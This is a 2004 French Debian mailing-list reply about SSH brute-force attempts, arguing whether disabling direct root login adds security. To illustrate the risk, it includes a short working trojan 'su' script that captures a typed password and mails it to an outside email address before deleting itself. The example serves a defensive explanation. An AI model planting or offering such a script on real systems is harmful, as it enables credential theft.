Re: Tentative d'intrusion ssh

To: <debian-user-french@lists.debian.org>
Subject: Re: Tentative d'intrusion ssh
From: Alain Tesio <alain@onesite.org>
Date: Wed, 11 Aug 2004 02:06:23 +0200
Message-id: <[🔎] 20040811020623.16d7bec1@alain>
In-reply-to: <[🔎] 199701c47f09$6eba68c0$0200a8c0@PORTABLE>
References: <[🔎] 199701c47f09$6eba68c0$0200a8c0@PORTABLE>

On Tue, 10 Aug 2004 20:39:54 +0200
"Corwin" <debian@lefeuvre.org> wrote:

> Voilà, j'ai un petit soucis que je n'avais pas avant (ou alors, je l'avais
> mais je ne l'avais pas remarqué)

C'est essentiel d'avoir logcheck ou analogue pour que les fichiers de
log servent à quelque chose.

> Dans mes log, je trouve fréquement ( 5 à 10 fois par jour) ce genre de
> choses :

Moi aussi, pas de quoi s'inquiéter si tu ne t'inquétais pas avant.

> Ma question est la suivante, que cherchent-ils à faire exactement ??????

A trouver un login, pour envoyer des spams, lancer des attaques sans
être tracés, avoir plein de sources pour des DDOS, ...

> Ils pensent pouvoir se connecter sans mot de passe avec l'utilisateur test
> ou encore en root (déjà autoriser root en ssh, faut être polio !!)

Je suis polio alors, je ne comprends pas en quoi je devrais me sentir
plus tranquille avec un user qui a le droit de passer root. Il faut bien
que j'arrive à root d'une manière ou d'une autre, je n'ai pas d'accès
physique à la machine.

Je suis le seul administrateur de la machine, j'utilise des clés et pas de password.
Il me faudrait faire un truc plus compliqué pour faire des backup par rsync.

Ca peut éventuellement servir à voir qui passe en root s'il y a plusieurs
admins, mais pour ça je préférerais encore plusieurs logins avec uid=0

C'est par défaut à yes dans Debian.
Comme ça t'as l'air évident que c'est polio, ça m'intéresse de savoir pourquoi.

Les arguments que j'ai trouvés c'est du genre de ça:

http://geodsoft.com/howto/ssh/servers.htm

"This forces a remote user to know two user passwords to login as root. First they
must know a normal user's password, then they must know root's password as well"

Et alors ?? Autant faire un password deux fois plus long si c'est le problème.

Quelqu'un qui trouve le password avec un keylogger ou autre peut aussi
bien trouver le deuxième. S'il n'a que le premier, il peut installer dans le path de
ce user un script "su" de ce genre:

echo -n "Password: "
read pass
echo $pass | mail joe9249@hotmail.com
sleep 2
echo "su: Authentification failure"
# là tu crois que tu t'es planté de password
echo "Sorry"
# Le prochain su marche
rm $0

Si tu considère que le premier password n'est pas aussi essentiel que si n'avais qu'un
vrai password root, ou si tu utilises ce compte régulièrement pour autre chose, c'est
pire.

Alain

--

void DogEmulator(obj)
{
	if !(Eat(obj) || Drink(obj) || Fuck(obj)) { PissOnIt(obj); }
}

Reply to:

References:
- Tentative d'intrusion ssh
  - From: "Corwin" <debian@lefeuvre.org>

Prev by Date: Re: [HS] Re: Mutt & Group reply
Next by Date: Re: Choix d'un WM (was: multi-gnome-terminal/locale UTF-8/...)
Previous by thread: Re: Tentative d'intrusion ssh
Next by thread: ipsec
Index(es):
- Date
- Thread